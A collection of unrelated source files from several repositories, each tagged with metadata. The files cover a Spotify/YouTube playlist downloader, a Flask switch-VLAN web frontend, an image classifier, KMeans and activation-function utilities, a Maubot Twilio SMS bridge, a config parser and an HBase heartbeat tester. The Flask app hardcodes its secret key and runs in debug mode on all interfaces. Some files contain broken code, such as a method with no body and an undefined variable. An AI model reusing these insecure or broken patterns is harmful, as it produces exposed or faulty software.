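        nnz, m, n = (int(x) for x in np.frombuffer(f.read(3 * 8), dtype=np.uint64))
        indptr = np.frombuffer(f.read((n + 1) * 4), dtype=np.int32)
        indices = np.frombuffer(f.read(nnz * 4), dtype=np.int32)
        data = np.frombuffer(f.read(nnz * 8), dtype=np.float64)
    return csc_matrix((data, indices, indptr), shape=(m, n))
```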
|
{
"source": "JeffCarpenter/spotify-playlist-downloader",
"score": 3
}
|
#### File: spotify-playlist-downloader/download_spotify_playlist/download.py
```python
import os
import csv
import eyed3
import argparse
import youtube_dl
import spotipy
import spotipy.util as util
from unidecode import unidecode
def get_songs_from_csvfile(csvfile, args):
songs = []
with open(csvfile, 'r') as csvfile:
reader = csv.reader(csvfile)
next(reader) # Skip the first line
if args.skip:
print('Skipping', args.skip, 'songs')
for i in range(args.skip):
next(reader)
for row in reader:
songs.append({
'name': unidecode(row[0]).strip(),
'artist': unidecode(row[1]).strip(),
'album': unidecode(row[2]).strip()
})
return songs
class MyLogger(object):
def debug(self, msg):
pass
def warning(self, msg):
pass
def error(self, msg):
print(msg)
def download_finish(d):
if d['status'] == 'finished':
print('\x1b[1A\x1b[2K')
print("\x1b[1A[\033[93mConverting\033[00m] %s" % d['filename'])
def download_songs(songs, folder):
for song in songs:
probable_filename = folder + '/' + song['name'] + ' - ' + \
song['artist'] + '.mp3'
if os.path.isfile(probable_filename):
# The file may already be there, so skip
print('[\033[93mSkipping\033[00m] %s by %s' % \
(song['name'], song['artist']))
continue
opts = {
'format': 'bestaudio/best',
'forcejson': True,
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '256',
}],
# 'verbose': True,
'progress_hooks': [download_finish],
'logger': MyLogger(),
'outtmpl': folder + '/' + song['name'] + ' - ' + song['artist'] + '.%(ext)s'
}
url = ' '.join([song['name'], song['artist'], 'audio', 'youtube'])
url = 'ytsearch:' + url
print('[\033[91mFetching\033[00m] %s' % probable_filename)
with youtube_dl.YoutubeDL(opts) as ydl:
ydl.download([url])
if os.path.isfile(probable_filename):
afile = eyed3.load(probable_filename)
afile.tag.title = song['name']
afile.tag.artist = song['artist']
afile.tag.album = song['album']
afile.tag.save()
else:
print('\x1b[1A\x1b[2K')
print('\x1b[1A[\033[91mMetadata\033[00m] Could not set metadata for %s\nTemp' % \
probable_filename)
print('\x1b[1A\x1b[2K')
print('\x1b[1A[\033[92mDownloaded]\033[00m', song['name'], '-', song['artist'])
def get_songs_from_playlist(tracks, args):
songs = []
for item in tracks['items'][args.skip:]:
track = item['track']
songs.append({
'name': unidecode(track['name']).strip(),
'artist': unidecode(track['artists'][0]['name']).strip(),
'album': unidecode(track['album']['name']).strip()
})
return songs
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-f', '--folder', help="keep the files in the folder specified")
parser.add_argument('-c', '--create', help="try to create folder if doesn't exist",
action="store_true")
parser.add_argument('--skip', help="number of songs to skip from the start of csv",
type=int)
group = parser.add_mutually_exclusive_group()
group.add_argument('-csv', help="input csv file")
group.add_argument('-username', help="username of your spotify account")
args = parser.parse_args()
# getting current working directory
folder = os.path.dirname(os.path.realpath(__file__))
if args.folder:
if os.path.isdir(args.folder):
folder = os.path.abspath(args.folder)
elif args.create:
try:
os.makedirs(args.folder)
folder = os.path.abspath(args.folder)
            except OSError:
print('Error while creating folder')
raise
else:
print('No such folder. Aborting..')
exit()
print('Storing files in', folder)
if args.csv:
if os.path.isfile(args.csv):
csvfile = args.csv
songs = get_songs_from_csvfile(csvfile, args)
download_songs(songs, folder)
else:
print('No such csv file. Aborting..')
exit()
if args.username:
scope = 'playlist-read playlist-read-private'
token = util.prompt_for_user_token(args.username, scope)
if token:
sp = spotipy.Spotify(auth=token)
try:
playlists = sp.user_playlists(args.username)
except spotipy.client.SpotifyException:
print("Invalid Username")
exit()
            if len(playlists['items']) > 0:
print("All Playlists: ")
for index, playlist in enumerate(playlists['items']):
print(str(index + 1) + ": " + playlist['name'])
n = input("Enter S.N. of playlists (seprated by comma): ").split(",")
if n:
for i in range(0, len(n), 2):
playlist_folder = folder+"/"+playlists['items'][int(n[i]) - 1]['name']
print('Storing files in', playlist_folder)
if not os.path.isdir(playlist_folder):
try:
                                os.makedirs(playlist_folder)
                            except OSError:
print('Error while creating folder')
raise
playlist_id = playlists['items'][int(n[i]) - 1]['id']
tracks = sp.user_playlist(args.username, playlist_id,
fields="tracks,next")['tracks']
songs = get_songs_from_playlist(tracks, args)
                        download_songs(songs, playlist_folder)
else:
print("No S.N. Provided! Aborting...")
else:
print("No Playlist Found!")
else:
print("Can't get token for", username)
exit()
if __name__ == '__main__':
main()
```
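A hedged sketch of the CSV layout get_songs_from_csvfile above expects: one header row (which the reader skips), then one row per song with the name, artist and album in the first three columns. The file name and songs are placeholders.
```python
# Hypothetical example of writing a CSV that the downloader can consume.
import csv

with open('playlist.csv', 'w', newline='') as f:
    writer = csv.writer(f)
    writer.writerow(['Track Name', 'Artist Name', 'Album Name'])  # header row, skipped on read
    writer.writerow(['Bohemian Rhapsody', 'Queen', 'A Night at the Opera'])
    writer.writerow(['Clair de Lune', 'Claude Debussy', 'Suite bergamasque'])
```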
|
{
"source": "Jeff-Carrell/API-Switch-Demo",
"score": 2
}
|
#### File: Jeff-Carrell/API-Switch-Demo/web.py
```python
from flask import Flask, redirect, url_for, flash
from flask import render_template
from flask import request
from aoss import loginOS, ports, vlan
import json
from requests.packages.urllib3 import disable_warnings
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import logging
logging.basicConfig(level=logging.INFO)
logger = logging.getLogger(__name__)
disable_warnings(InsecureRequestWarning)
#
# This section is no longer used. Please go to http://127.0.0.1:5000/config
# to configure this web frontend. You can also edit config.json, though
# the above web frontend is best.
#
# Open config file for username, password, switch, ignored vlans, etc
with open('config.json') as lf:
data = json.load(lf)
app = Flask(__name__)
app.secret_key = 'EF657435D29A74A40A96B5AF3792AD0D322BE69EAC77DFE13CF23B3B46201970'
@app.route('/get_ports')
def get_ports():
# data = {"user": username, "password": password, "ipadd": switch_ip}
with open('config.json') as lf:
data = json.load(lf)
baseurl = "https://{}/rest/v4/".format(data['ipadd'])
cookie_header = loginOS.login_os(data, baseurl)
listvlans = vlan.get_vlan(baseurl, cookie_header)['vlan_element']
listports = ports.get_ports(baseurl, cookie_header)
listvlansports = vlan.get_vlans_ports(baseurl, cookie_header)
useablevlans = []
for lvlan in listvlans:
if str(lvlan['vlan_id']) not in data['ignored_vlans']:
useablevlans.append({'vlan_id': lvlan['vlan_id'], 'vlan_name': lvlan['name']})
def test_get_ports():
cookie_header = loginOS.login_os(data, baseurl)
loginOS.logout(baseurl, cookie_header)
numberofports = listports['collection_result']['total_elements_count']
loginOS.logout(baseurl, cookie_header)
port_status = data['port_status']
title = data['title']
return render_template('ports.html', title=title, ports=listports['port_element'],
listvlansports=listvlansports['vlan_port_element'],
vlans=listvlans, numofports=numberofports,
useablevlans=useablevlans, port_status=port_status, data=data)
@app.route("/")
def root():
title=data['title']
return render_template('index.html', title=title)
@app.route('/portsetup')
def port_setup():
results = "Port Config"
return render_template('port_setup.html', title='Port Configuration', results=results)
@app.route('/ivlan_config', methods=['GET', 'POST'])
def ivlan_config():
if request.method == 'POST':
with open('config.json') as f:
data = json.load(f)
baseurl = "https://{}/rest/v4/".format(data['ipadd'])
cookie_header = loginOS.login_os(data, baseurl)
loginOS.logout(baseurl, cookie_header)
ivlans = request.form.getlist('ivlans')
newdata = {}
newdata['user'] = data['user']
newdata['password'] = data['password']
newdata['ipadd'] = data['ipadd']
newdata['title'] = data['title']
newdata['ignored_vlans'] = ivlans
newdata['port_status'] = data['port_status']
newdata['port_start'] = data['port_start']
newdata['port_end'] = data['port_end']
with open('config.json', 'w') as fp:
json.dump(newdata, fp)
flash('Ignored VLANS successfully updated')
with open('config.json') as f:
data = json.load(f)
baseurl = "https://{}/rest/v4/".format(data['ipadd'])
cookie_header = loginOS.login_os(data, baseurl)
listvlans = vlan.get_vlan(baseurl, cookie_header)['vlan_element']
loginOS.logout(baseurl, cookie_header)
av = []
for lv in listvlans:
av.append(lv['vlan_id'])
ignored = list(map(int, data['ignored_vlans']))
av_c = {}
for a in av:
if a in ignored:
av_c[a] = True
else:
av_c[a] = False
return render_template('ivlan_config.html', title='Config Demo', data=data, ignored=ignored, allvlans=listvlans, avc=av_c)
@app.route('/config', methods=['GET', 'POST'])
def config():
if request.method == 'POST':
with open('config.json') as f:
data = json.load(f)
newdata = {}
user = request.form.get('user')
port_status = request.form.get('port_status')
ipadd = request.form.get('ipadd')
title = request.form.get('title')
ivlans = request.form.getlist('ivlans')
if request.form.get('password') is None or request.form.get('password') == "":
password = data['password']
else:
            password = request.form.get('password')
newdata['port_start'] = request.form.get('port_start')
newdata['port_end'] = request.form.get('port_end')
newdata['user'] = user
newdata['password'] = password
newdata['ipadd'] = ipadd
newdata['title'] = title
newdata['ignored_vlans'] = data['ignored_vlans']
newdata['port_status'] = port_status
with open('config.json', 'w') as fp:
json.dump(newdata, fp)
flash('Configuration successfully updated')
with open('config.json') as f:
data = json.load(f)
return render_template('config.html', title='Config Demo', data=data)
@app.route('/port_update', methods=['GET', 'POST'])
def port_update():
# data = {"user": user, "password": password, "ipadd": switch_ip}
baseurl = "https://{}/rest/v4/".format(data['ipadd'])
cookie_header = loginOS.login_os(data, baseurl)
if request.method == 'POST':
requestmethod = request.form
port_id = request.form.get('port_id')
newvlan = int(request.form.get('newvlan'))
# {'vlan_id': 102, 'port_id': 'trk1', 'port_mode': 'POM_TAGGED_STATIC'},
vlanport = {'vlan_id': newvlan, 'port_id': port_id, 'port_mode': 'POM_UNTAGGED'}
response = vlan.create_vlan_with_port(baseurl, vlanport, cookie_header)
title = "Port Config"
loginOS.logout(baseurl, cookie_header)
return redirect(url_for('get_ports', title=title))
# return render_template('port_setup.html', title='Port Configuration', results=results)
if __name__ == "__main__":
app.run(debug=True, host='0.0.0.0', port=5000)
```
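A hedged sketch of a starter config.json for the frontend above, generated from Python; every value is a placeholder, and the key set mirrors what web.py reads and rewrites.
```python
# Hypothetical starter config.json for the switch demo; all values are placeholders.
import json

starter_config = {
    "user": "admin",
    "password": "changeme",
    "ipadd": "10.0.0.1",
    "title": "API Switch Demo",
    "ignored_vlans": ["1"],          # compared as strings against vlan_id
    "port_status": "Up",
    "port_start": "1",
    "port_end": "24",
}

with open('config.json', 'w') as fp:
    json.dump(starter_config, fp, indent=2)
```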
|
{
"source": "jeff-carter/FlowerImageClassifier",
"score": 3
}
|
#### File: jeff-carter/FlowerImageClassifier/predict.py
```python
import util
import checkpoint
import numpy as np
import torch
import json
from PIL import Image
def main():
'''
The main method of train.py
'''
args = util.get_predict_args()
np_image = process_image(args.path_to_image)
if (args.device == 'cuda'):
t_image = torch.from_numpy(np_image).type(torch.cuda.FloatTensor).unsqueeze(0)
else:
t_image = torch.from_numpy(np_image).type(torch.FloatTensor).unsqueeze(0)
model = checkpoint.load(args.checkpoint)[0]
model.to(args.device)
model.eval()
with torch.no_grad():
logps = model.forward(t_image)
ps = torch.exp(logps)
top_p, top_class = ps.topk(args.top_k, dim=1)
np_top_p, np_top_class = top_p.cpu().numpy(), top_class.cpu().numpy()
if args.category_names:
with open(args.category_names, 'r') as f:
cat_to_name = json.load(f)
for (x, y), value in np.ndenumerate(np_top_class):
print(f"Name: {cat_to_name.get(str(value))},\tCertainty: {np_top_p[x][y]:.5f}")
else:
for (x, y), value in np.ndenumerate(np_top_class):
print(f"Class: {value},\tCertainty: {np_top_p[x][y]:.5f}")
def process_image(image_path):
''' Scales, crops, and normalizes a PIL image for a PyTorch model,
returns an Numpy array
Parameters:
image_path - the file path of the image
Returns:
np_image - the processed image as a numpy array
'''
# Process a PIL image for use in a PyTorch model
image = Image.open(image_path)
image.thumbnail((256, 256))
width, height = image.size
new_width, new_height = 224, 224
left = (width - new_width)/2
upper = (height - new_height)/2
right = left + new_width
lower = upper + new_height
image = image.crop((left, upper, right, lower))
mean_colors = np.array([0.485, 0.456, 0.406])
std_dev_colors = np.array([0.229, 0.224, 0.225])
np_image = np.array(image) / 255
np_image = (np_image - mean_colors) / std_dev_colors
np_image = np_image.transpose((2, 0, 1))
return np_image
if __name__ == '__main__':
main()
```
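A hedged sketch of calling process_image above directly; the image path is made up, and the tensor conversion mirrors what main() does on the CPU branch.
```python
# Hypothetical direct use of process_image; the path is a placeholder.
import torch

np_image = process_image('flowers/test/1/image_06743.jpg')
print(np_image.shape)                                   # (3, 224, 224)
t_image = torch.from_numpy(np_image).type(torch.FloatTensor).unsqueeze(0)
print(t_image.shape)                                    # torch.Size([1, 3, 224, 224])
```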
|
{
"source": "jeffcarter-github/MachineLearningLibrary",
"score": 3
}
|
#### File: MachineLearningLibrary/Cluster/KMeans.py
```python
import numpy as np
from scipy import stats
class KMeans(object):
def __init__(self, n_clusters, init='kmeans++', max_iter=300,
random_state=None):
self.n_clusters = n_clusters
self.init = init
self.max_iter = max_iter
self.random_state = random_state
self.n_samples = None
self.n_features = None
self.cluster_centers = None
self.inertia = None
if self.n_clusters < 2:
raise ValueError()
if self.init not in ['forgy', 'random', 'kmeans++']:
raise ValueError()
if self.max_iter <= 0:
raise ValueError()
if self.random_state:
if not isinstance(self.random_state, int):
raise ValueError()
else:
np.random.seed(self.random_state)
def _check_data(self, X):
if not isinstance(X, np.ndarray):
raise ValueError()
else:
self.n_samples, self.n_features = X.shape
if self.n_clusters > self.n_samples:
raise ValueError()
def _init_clusters(self, X):
if self.init == 'forgy':
idx = np.random.randint(0, self.n_samples, self.n_clusters)
self.cluster_centers = X[idx, :]
elif self.init == 'random':
assignments =\
np.argmin(np.random.rand(self.n_clusters, self.n_samples), axis=0)
self.cluster_centers =\
np.array([np.average(X[assignments == i], axis=0)
for i in range(self.n_clusters)])
elif self.init == 'kmeans++':
c_k = np.random.choice(range(X.shape[0]), 1)
self.cluster_centers = [X[c_k]]
for i in range(1, self.n_clusters):
x_k = range(self.n_samples)
p_k = np.square(np.min([self._calculate_distances(X, center) for center in self.cluster_centers], axis=0))
p_k = p_k / np.sum(p_k)
c_k = stats.rv_discrete(values=(x_k, p_k)).rvs(size=1)
self.cluster_centers.append(X[c_k])
self.cluster_centers = np.array(self.cluster_centers)
def _assign_data(self, X):
distances = []
for cluster_center in self.cluster_centers:
distances.append(self._calculate_distances(X, cluster_center))
distances = np.array(distances)
return np.argmin(distances, axis=0)
def _calculate_distances(self, X, point):
return np.sqrt(np.sum(np.square(point - X[:, ]), axis=1))
def _calculate_inertia(self, X):
        labels = self._assign_data(X)
        points = self.cluster_centers[labels]
        self.inertia = np.sum(self._calculate_distances(X, points))
def _calculate_centers(self, X, labels):
centers = []
for cluster in range(self.n_clusters):
center = np.average(X[labels == cluster], axis=0)
if np.sum(np.isfinite(center)==False) != 0:
center = self.cluster_centers[cluster]
centers.append(center)
self.cluster_centers = np.array(centers)
def fit(self, X):
self._check_data(X)
self._init_clusters(X)
for i in range(self.max_iter):
idx = self._assign_data(X)
self._calculate_centers(X, idx)
self._calculate_inertia(X)
```
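A hedged usage sketch for the KMeans class above on toy two-dimensional data; the data, seed and expected centres are illustrative.
```python
# Hypothetical k-means run on two well-separated Gaussian blobs.
import numpy as np

X = np.vstack([np.random.randn(50, 2), np.random.randn(50, 2) + 5.0])
km = KMeans(n_clusters=2, init='kmeans++', random_state=1)
km.fit(X)
print(km.cluster_centers)   # two centres, roughly (0, 0) and (5, 5)
print(km.inertia)           # sum of distances from samples to their assigned centre
```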
#### File: MachineLearningLibrary/NeuralNetworks/NeuralNetworkUtilities.py
```python
import numpy as np
def identity(z):
"""Identity function...
Args:
z (np.array)
Returns:
f(z) = z (np.array)
"""
return z
def dfdz_identity(z):
"""Derivative of the Identity function...
Args:
z (np.array)
Returns:
df(z)/dz = 1.0 (np.array)
"""
return np.ones_like(z)
def sigmoid(z):
"""Sigmoid function...
Args:
z (np.array)
Returns:
f(z) = 1 / (1 + exp(-z)) (np.array)
"""
return 1.0 / (1.0 + np.exp(-z))
def dfdz_sigmoid(z):
"""Derivative of the Sigmoid function...
Args:
z (np.array)
Returns:
df(z)/dz = f(z) * (1 - f(z)) (np.array)
"""
return sigmoid(z) * (1.0 - sigmoid(z))
def logistic(z):
"""Logistic function...
Args:
z (np.array)
Returns:
f(z) = 1 / (1 + exp(-z)) (np.array)
"""
return sigmoid(z)
def dfdz_logistic(z):
"""Derivative of the Logistic function...
Args:
z (np.array)
Returns:
df(z)/dz = f(z) * (1 - f(z)) (np.array)
"""
return sigmoid(z) * (1.0 - sigmoid(z))
def tanh(z):
"""Hyperbolic tangent function...
Args:
z (np.array)
Returns:
f(z) = 2.0 / (1.0 + np.exp(-2.0 * z)) - 1.0 (np.array)
"""
return 2.0 / (1.0 + np.exp(-2.0 * z)) - 1.0
def dfdz_tanh(z):
"""Derivative of the hyperbolic tangent function...
Args:
z (np.array)
Returns:
df(z)/dz = 1.0 - np.square(tanh(z)) (np.array)
"""
return 1.0 - np.square(tanh(z))
def softsign(z):
"""Softsign function...
Args:
z (np.array)
Returns:
f(z) = z / (1.0 + np.abs(z)) (np.array)
"""
return z / (1.0 + np.abs(z))
def dfdz_softsign(z):
"""Derivative of the softsign function...
Args:
z (np.array)
Returns:
        df(z)/dz = 1.0 / np.square(1.0 + np.abs(z)) (np.array)
    """
    return 1.0 / np.square(1.0 + np.abs(z))
def ReLU(z):
"""Rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = np.max(0, z) (np.array)
"""
return z * (z > 0)
def dfdz_ReLU(z):
"""Derivative of the rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else 0 (np.array)
"""
return (z > 0)
def LReLU(z):
"""Leaky rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = z if z > 0 else 0.01 * z (np.array)
"""
return PReLU(z, 0.01)
def dfdz_LReLU(z):
"""Derivative of the leaky rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else 0.01 (np.array)
"""
return dfdz_PReLU(z, 0.01)
def PReLU(z, alpha):
"""Parametric rectified linear unit function...
Args:
z (np.array)
Returns:
f(z) = z if z > 0 else alpha * z (np.array)
"""
return z * (z > 0) + alpha * z * (z <= 0)
def dfdz_PReLU(z, alpha):
"""Derivative of the parametric rectified linear unit function...
Args:
z (np.array)
Returns:
df(z)/dz = 1 if x > 0 else alpha (np.array)
"""
return 1.0 * (z > 0) + alpha * (z <= 0)
```
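A hedged sanity check for the derivatives above: compare dfdz_sigmoid against a central finite-difference approximation of sigmoid; the grid and step size are arbitrary.
```python
# Hypothetical finite-difference check of dfdz_sigmoid.
import numpy as np

z = np.linspace(-3.0, 3.0, 7)
eps = 1e-6
numeric = (sigmoid(z + eps) - sigmoid(z - eps)) / (2.0 * eps)
analytic = dfdz_sigmoid(z)
print(np.max(np.abs(numeric - analytic)))   # expected to be tiny, on the order of 1e-10
```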
|
{
"source": "jeffcarter-github/TensorFlow_MD",
"score": 3
}
|
#### File: TensorFlow_MD/Ensembles/Ensemble.py
```python
import numpy as np
import constants
class BaseEnsemble(object):
def __init__(self, dt=None):
self.dt = dt
self.atom_coords = None
self.md_integrator = None
def set_timestep(self, dt):
''''''
self.dt = dt
def create_atoms(self, )
class NVT(BaseEnsemble):
'''Canonical Ensemble (NVT) Simulation Class
Attributes:
dt (float): time step for EOM integration in picoseconds
atom_coords: (tf.array) ...
md_integrator: (object): alogrithm for EOM integration
temperature (float): temperature in Kelvin
thermostat (object): thermostat instance
'''
def __init__(self):
self.temperature = None
def set_temperature(self, temperature):
'''Set the system temperature
Args:
temperature (float): in Kelvin'''
self.temperature = temperature
def set_thermostat(self, thermostat):
'''Set the alorithm for temperature control
Args:
thermostat (object): instance of thermostat class'''
self.thermostat = thermostat
class NVE(BaseEnsemble):
def __init__(self):
pass
class NPT(BaseEnsemble):
def _init__(self):
pass
```
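A hedged sketch of wiring up the NVT skeleton above; the time step and temperature are illustrative, and no integrator or thermostat is attached.
```python
# Hypothetical setup of the canonical-ensemble skeleton.
nvt = NVT()
nvt.set_timestep(0.001)        # picoseconds
nvt.set_temperature(300.0)     # Kelvin
```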
|
{
"source": "jeffcasavant/MaubotTwilio",
"score": 2
}
|
#### File: MaubotTwilio/twilio_plugin/migrations.py
```python
from sqlalchemy import select
from sqlalchemy.engine.base import Engine
from alembic.migration import MigrationContext
from alembic.operations import Operations
def run(engine: Engine):
conn = engine.connect()
ctx = MigrationContext.configure(conn)
op = Operations(ctx)
```
#### File: MaubotTwilio/twilio_plugin/plugin.py
```python
from typing import Type
from aiohttp import web
from maubot import Plugin, MessageEvent
from maubot.handlers import command, event, web as web_handler
from mautrix.types import EventType, TextMessageEventContent, MessageType, Format
from mautrix.util.config import BaseProxyConfig, ConfigUpdateHelper
from twilio.rest import Client
from twilio.base.exceptions import TwilioRestException
from .db import Database
PREFIX = "<sms>"
class Config(BaseProxyConfig):
def do_update(self, helper: ConfigUpdateHelper) -> None:
helper.copy("twilio_account_sid")
helper.copy("twilio_auth_token")
helper.copy("twilio_source_number")
helper.copy("admins")
class WebhookReceiver:
def __init__(self, db, log, client):
self.db = db # pylint: disable=invalid-name
self.log = log
self.client = client
@web_handler.post("/sms")
async def handle_sms(self, request: web.Request) -> web.Response:
params = await request.post()
number = params["From"]
body = params["Body"]
self.log.debug("Received sms from %s: %s", number, body)
row = self.db.get(number=number)
if not row:
self.log.info("No room mapping for %s", number)
else:
row = row[0]
content = TextMessageEventContent(msgtype=MessageType.TEXT, body=f"{PREFIX} {row.name}: {body}")
await self.client.send_message(row.room, content)
return web.Response(status=200)
class TwilioPlugin(Plugin):
db: Database
async def start(self) -> None:
# pylint: disable=attribute-defined-outside-init
await super().start()
self.config.load_and_update()
self.db = Database(self.log, self.database) # pylint: disable=invalid-name
self.log.debug("Logging in to twilio")
self.twilio_client = Client(self.config["twilio_account_sid"], self.config["twilio_auth_token"])
self.webhook_receiver = WebhookReceiver(self.db, self.log, self.client)
self.register_handler_class(self.webhook_receiver)
@classmethod
def get_config_class(cls) -> Type[BaseProxyConfig]:
return Config
@event.on(EventType.ROOM_MESSAGE)
async def handler(self, evt: MessageEvent) -> None:
content = evt.content
if not content.msgtype.is_text or content.body.startswith("!") or content.body.startswith(PREFIX):
return
self.log.debug("Twilio bot handling message in %s: %s", evt.room_id, content.body)
numbers = self.db.get(room=evt.room_id)
self.log.debug("DB resp %s", numbers)
self.log.info("Forwarding message to %d numbers", len(numbers))
for number in numbers:
self.log.debug("Sending message to %s (%s)", number.name, number.number)
try:
self.twilio_client.messages.create(
to=number.number, from_=self.config["twilio_source_number"], body=f"{evt.sender}: {content.body}"
)
except TwilioRestException:
self.log.exception("Failed to send to %s (%s)", number.name, number.number)
await evt.mark_read()
@command.new("removesms", help="Remove an SMS correspondent from this room")
@command.argument("identifier", required=True)
async def removesms_handler(self, evt: MessageEvent, identifier: str) -> None:
if evt.sender not in self.config.get("admins", []):
content = TextMessageEventContent(
msgtype=MessageType.TEXT, body="You are not authorized to configure this plugin"
)
await self.client.send_message(evt.room_id, content)
return
self.log.info("Removing SMS correspondent %s for room %s", identifier, evt.room_id)
await evt.mark_read()
self.db.unmap(identifier=identifier)
content = TextMessageEventContent(msgtype=MessageType.TEXT, body=f"Removed {identifier}")
await self.client.send_message(evt.room_id, content)
@command.new("addsms", help="Add an SMS correspondent to this room")
@command.argument("alias", required=True)
@command.argument("number", required=True)
async def addsms_handler(self, evt: MessageEvent, alias: str, number: str) -> None:
if evt.sender not in self.config.get("admins", []):
content = TextMessageEventContent(
msgtype=MessageType.TEXT, body="You are not authorized to configure this plugin"
)
await self.client.send_message(evt.room_id, content)
return
self.log.info("Registering new SMS correspondent %s (%s) for room %s", alias, number, evt.room_id)
self.db.map(name=alias, number=number, room=evt.room_id)
await evt.mark_read()
content = TextMessageEventContent(msgtype=MessageType.TEXT, body=f"Added {alias} ({number})")
await self.client.send_message(evt.room_id, content)
@command.new("listsms", help="List all SMS correspondents in this room")
async def listsms_handler(self, evt: MessageEvent) -> None:
self.log.info("Listing SMS correspondents for room %s", evt.room_id)
await evt.mark_read()
members = [{"name": row.name, "number": row.number} for row in self.db.list(room=evt.room_id)]
plain_members = "\n".join([f"{member['name']}: {member['number']}" for member in members])
html_members = "\n".join(
[f"<tr><td>{member['name']}</td><td>{member['number']}</td></tr>" for member in members]
)
header = "Current SMS participants:"
formatted_body = f"{header}\n<table>\n{html_members}\n</table>"
content = TextMessageEventContent(
msgtype=MessageType.TEXT,
format=Format.HTML,
body=f"{header}\n{plain_members}",
formatted_body=formatted_body,
)
await self.client.send_message(evt.room_id, content)
```
|
{
"source": "jeffcasavant/vyper",
"score": 3
}
|
#### File: vyper/vyper/util.py
```python
import logging
import os
import pathlib
import toml
import yaml
try:
import ujson as json
except ImportError:
import json
try:
FileNotFoundError
except NameError:
FileNotFoundError = OSError
log = logging.getLogger("vyper.util")
class ConfigParserError(Exception):
"""Denotes failing to parse configuration file."""
def __init__(self, message, *args):
self.message = message
super(ConfigParserError, self).__init__(message, *args)
def __str__(self):
return "While parsing config: {0}".format(self.message)
def abs_pathify(in_path):
log.info("Trying to resolve absolute path to {0}".format(in_path))
try:
return pathlib.Path(in_path).resolve()
except FileNotFoundError as e:
log.error("Couldn't discover absolute path: {0}".format(e))
return ""
def exists(path):
try:
os.stat(str(path))
return True
except FileNotFoundError:
return False
def unmarshall_config_reader(r, d, config_type):
config_type = config_type.lower()
if config_type in ["yaml", "yml"]:
try:
f = yaml.safe_load(r)
try:
d.update(yaml.safe_load(f))
except AttributeError: # to read files
d.update(f)
except Exception as e:
raise ConfigParserError(e)
elif config_type == "json":
try:
f = json.loads(r)
d.update(f)
except Exception as e:
raise ConfigParserError(e)
elif config_type == "toml":
try:
try:
d.update(toml.loads(r))
except TypeError: # to read files
try:
d.update(toml.load(r))
except TypeError: # to read streams
d.update(r)
except Exception as e:
raise ConfigParserError(e)
return d
```
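A minimal usage sketch of `unmarshall_config_reader`, assuming it is imported from `vyper.util`; the raw strings below stand in for file contents read elsewhere, and the target dict is updated in place.

```python
# Hedged sketch: parsing raw config strings of different types into one dict.
from vyper.util import unmarshall_config_reader

settings = {}
unmarshall_config_reader('{"host": "localhost", "port": 5432}', settings, "json")
unmarshall_config_reader("debug: true\nworkers: 4", settings, "yaml")
print(settings)  # {'host': 'localhost', 'port': 5432, 'debug': True, 'workers': 4}
```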
|
{
"source": "jeffchen81/hbase-calltest-webapp",
"score": 2
}
|
#### File: jeffchen81/hbase-calltest-webapp/hbase_calltest.py
```python
import hbase
import sys
import time
import pytz
from es_utils import EsUtils
from datetime import datetime, timedelta
# HBase table model
HBASE_NS = 'calltest'
HBASE_CF = 'heartbeat'
class HbaseCalltest(object):
'''HBase dial-test (heartbeat) utility class'''
def __init__(self, zk_conf='0.0.0.0:2181', *args, **kwargs):
self._zk_conf = zk_conf
self._conn = None
self._es_utils = None
@property
def zk_conf(self):
return self._zk_conf
@zk_conf.setter
def zk_conf(self, zk_conf):
self._zk_conf = zk_conf
@property
def es_utils(self):
return self._es_utils
@es_utils.setter
def es_utils(self, es_utils):
if isinstance(es_utils, EsUtils):
self._es_utils = es_utils
else:
raise TypeError('es_utils must be an EsUtils instance')
def get_conn(self):
'''Get the HBase connection'''
if self._conn is None:
self._conn = hbase.ConnectionPool(self._zk_conf).connect()
return self._conn
def conn_close(self):
'''Close the HBase connection'''
if self._conn:
self._conn.close()
pass
def run_task(self):
'''Run the dial-test task: read the latest NO, then write NO+1'''
last_cf_no = 0
last_write_time = 0
try:
table = self.get_conn()[HBASE_NS][HBASE_CF]
# Only scan the 10 most recent rows
for row in table.scan(batch_size=10):
# print(row)
last_cf_no = int(str(row['cf:no'], encoding='utf-8'))
last_write_time = sys.maxsize - int(row.key)
break
curr_cf_no = last_cf_no + 1
self.write_new_row(cf_no=curr_cf_no, table=table)
self.send_metric(curr_cf_no=curr_cf_no, last_write_time=last_write_time)
except Exception as e:
raise RuntimeError("run_task failed: " + str(e))
def write_new_row(self, cf_no, table):
'''Write a new row, incrementing the previous no by 1'''
curr_rowkey = generate_rowkey()
table.put(hbase.Row(
str(curr_rowkey), {
'cf:no': str(cf_no).encode()
}
))
def send_metric(self, curr_cf_no, last_write_time):
'''Send the metric to Elasticsearch'''
if self._es_utils:
self._es_utils.write(get_es_doc(
cf_no=curr_cf_no,
last_write_time=last_write_time
))
pass
def get_es_doc(cf_no, last_write_time):
'''Build the doc to write to Elasticsearch
:param cf_no: current auto-increment number
:param last_write_time: timestamp of the previous write to HBase
'''
# Current write time
ct = time.time()
# Write using the UTC+8 (Asia/Shanghai) timezone
t = datetime.fromtimestamp(round(ct, 3), pytz.timezone(
'Asia/Shanghai')).strftime('%Y-%m-%dT%H:%M:%S.%f%z')
# Response time = current time - last write time
rt = int(ct) - int(last_write_time)
doc = {
'last_write_time': datetime.fromtimestamp(int(last_write_time)),
'no': int(cf_no),
'response_time': rt,
'timestamp': t
}
return doc
def generate_rowkey():
'''Generate a unique rowkey: max Long minus the current timestamp'''
now_timestamp = int(time.time())
return sys.maxsize - now_timestamp
if __name__ == '__main__':
demo = HbaseCalltest(zk_conf='0.0.0.0:2181')
demo.es_utils = EsUtils(es_list=['0.0.0.0:9200'])
demo.run_task()
demo.conn_close()
```
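The rowkey scheme above stores `sys.maxsize - timestamp`, so newer rows get smaller keys and a forward scan returns the latest heartbeat first; `run_task` recovers the original timestamp by subtracting the key from `sys.maxsize` again. A small self-contained sketch of that round trip:

```python
# Hedged sketch of the reverse-timestamp rowkey scheme (no HBase connection needed).
import sys

def make_rowkey(ts: int) -> int:
    return sys.maxsize - ts

older = make_rowkey(1_600_000_000)
newer = make_rowkey(1_700_000_000)
assert newer < older                          # the newest row sorts first in a scan
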